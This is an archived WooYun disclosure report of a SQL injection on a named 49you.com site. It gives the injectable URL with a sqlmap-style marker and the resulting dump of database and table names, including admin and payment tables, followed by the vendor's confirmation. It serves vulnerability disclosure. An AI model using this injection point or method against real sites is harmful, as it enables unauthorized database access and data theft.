49游某站MySql伪静态注入之二 | wooyun-2015-0123283| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0123283

漏洞标题：49游某站MySql伪静态注入之二

漏洞作者： DloveJ

提交时间：2015-06-29 13:05

修复时间：2015-08-13 13:08

公开时间：2015-08-13 13:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-29：细节已通知厂商并且等待厂商处理中
2015-06-29：厂商已经确认，细节仅向厂商公开
2015-07-09：细节向核心白帽子及相关领域专家公开
2015-07-19：细节向普通白帽子公开
2015-07-29：细节向实习白帽子公开
2015-08-13：细节向公众公开

简要描述：

听说有奖励！！！

详细说明：

http://i.49you.com/news/item/catid/55/id/15*

手工测出有洞，工具。。

漏洞证明：

available databases [2]:
[*] i_49you
[*] information_schema

Database: i_49you
[100 tables]
+--------------------+
| admin              |
| admin_panel        |
| admin_role         |
| admin_role_priv    |
| announce           |
| attachment         |
| attachment_index   |
| badword            |
| block              |
| block_history      |
| block_priv         |
| cache              |
| category           |
| category_priv      |
| collection_content |
| collection_history |
| collection_node    |
| collection_program |
| content_check      |
| copyfrom           |
| datacall           |
| dbsource           |
| download           |
| download_data      |
| downservers        |
| extend_setting     |
| favorite           |
| game               |
| game_data          |
| hits               |
| ipbanned           |
| keylink            |
| keyword            |
| keyword_data       |
| link               |
| linkage            |
| log                |
| member             |
| member_detail      |
| member_group       |
| member_menu        |
| member_verify      |
| member_vip         |
| menu               |
| message            |
| message_data       |
| message_group      |
| model              |
| model_field        |
| module             |
| mood               |
| news               |
| news_data          |
| page               |
| pay_account        |
| pay_payment        |
| pay_spend          |
| position           |
| position_data      |
| poster             |
| poster_201409      |
| poster_201506      |
| poster_space       |
| queue              |
| release_point      |
| search             |
| search_keyword     |
| session            |
| site               |
| sms_report         |
| special            |
| special_c_data     |
| special_content    |
| sphinx_counter     |
| sqlmapoutput       |
| sso_admin          |
| sso_applications   |
| sso_members        |
| sso_messagequeue   |
| sso_session        |
| sso_settings       |
| tag                |
| template_bak       |
| test_artice        |
| test_artice_data   |
| test_picture       |
| test_picture_data  |
| times              |
| type               |
| urlrule            |
| video              |
| video_content      |
| video_data         |
| video_store        |
| vote_data          |
| vote_option        |
| vote_subject       |
| wap                |
| wap_type           |
| workflow           |
+--------------------+

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-06-29 13:07

厂商回复：

这个问题也已经有人反馈了，并我们已经关闭访问了
感谢白帽子@DloveJ 技术已经收到，并处理中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0123283

漏洞标题：49游某站MySql伪静态注入之二

相关厂商：49you.com

漏洞作者： DloveJ

提交时间：2015-06-29 13:05

修复时间：2015-08-13 13:08

公开时间：2015-08-13 13:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0123283

漏洞标题：49游某站MySql伪静态注入之二

相关厂商：49you.com

漏洞作者： DloveJ

提交时间：2015-06-29 13:05

修复时间：2015-08-13 13:08

公开时间：2015-08-13 13:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0123283"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：